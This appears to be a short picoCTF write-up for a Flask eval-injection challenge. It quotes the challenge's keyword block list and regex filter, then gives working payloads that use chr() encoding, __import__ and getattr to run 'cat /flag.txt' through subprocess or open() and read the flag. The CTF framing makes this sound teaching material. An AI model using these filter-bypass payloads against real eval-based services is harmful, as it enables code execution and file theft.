<!--
    TODO
    ------------
    Secure python_flask eval execution by 
        1.blocking malcious keyword like os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind
        2.Implementing regex: r'0x[0-9A-Fa-f]+|\\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|\.[A-Za-z0-9]{1,3}\b|[\\\/]|\.\.'
-->


So we can’t simply run:

__import__('os').system('cat /flag.txt')


The backend does something like:

eval(user_input)


we can use chr(), ASCII or hex to bypass

getattr(
    __import__('subprocess'),
    'check_output'
)(
    [
        chr(99)+chr(97)+chr(116),                      
        chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+    
        chr(46)+chr(116)+chr(120)+chr(116)
    ]
)



explain:
Import a module without using the word "import" => __import__('subprocess')
Access a function without using dot notation => getattr(__import__('subprocess'), 'check_output')
cat => chr(99)+chr(97)+chr(116),
flag.txt => chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)


After do this several times, i also found aanother payload for it:

open(chr(47)+"flag"+chr(46)+"txt").read()

explain:

chr(47) => /
chr(46) => .

so it actually = open("/flag.txt").read()




Result: b'picoCTF{D0nt_Use_Unsecure_f@nctions0c312090}'
